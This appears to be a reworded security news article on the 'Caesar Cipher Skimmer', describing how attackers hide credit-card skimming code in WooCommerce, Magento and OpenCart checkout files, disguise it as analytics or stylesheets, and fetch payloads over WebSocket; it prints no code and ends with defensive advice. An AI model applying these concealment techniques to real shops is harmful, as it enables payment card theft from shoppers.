A fresh breed of credit card web skimmer, known as Caesar Cipher Skimmer, has emerged, infiltrating multiple content management system (CMS) platforms, including WordPress, Magento, and OpenCart.
This pernicious web skimmer represents a form of malware surreptitiously embedded within e-commerce websites with the nefarious intent of expropriating financial and payment data.
According to Sucuri, this latest incursion involves nefarious alterations to the checkout PHP file linked with the WooCommerce plugin for WordPress (“form-checkout.php”), aiming to exfiltrate credit card information.
“For several months, these injections have been refined to appear less conspicuous than a lengthy obfuscated script,” observed security researcher Ben Martin, noting the malware’s cunning disguise as Google Analytics and Google Tag Manager.
The skimmer employs the substitution technique characteristic of the Caesar cipher to transmute the malicious code into a scrambled string, obfuscating the external domain hosting the payload.
It is surmised that these websites were previously compromised via other vectors, enabling the staging of a PHP script labeled “style.css” and “css.php” to mimic an HTML style sheet, thereby eluding detection.
These scripts are subsequently configured to deploy another obfuscated JavaScript code, which establishes a WebSocket connection to another server to retrieve the actual skimmer.
“The script transmits the URL of the current web pages, empowering the assailants to deliver bespoke responses for each compromised site,” Martin elaborated. “Certain iterations of the secondary script even ascertain if it is executed by a logged-in WordPress user and modify the response accordingly.”
Certain script versions contain programmer-readable annotations in Russian, implying that the masterminds behind this operation are Russian-speaking.
The form-checkout.php file in WooCommerce is not the sole vector for skimmer deployment; attackers have also been detected exploiting the legitimate WPCode plugin to inject malicious code into the website database.
On Magento-powered sites, JavaScript injections target database tables such as core_config_data. The method of execution on OpenCart sites remains unknown.
Due to its extensive usage as a website foundation, WordPress and its vast plugin ecosystem have become attractive targets for malicious actors, offering them ample opportunities to exploit a wide attack surface.
It is crucial for site proprietors to maintain their CMS software and plugins up-to-date, uphold stringent password hygiene, and regularly scrutinize for any suspicious administrator accounts.
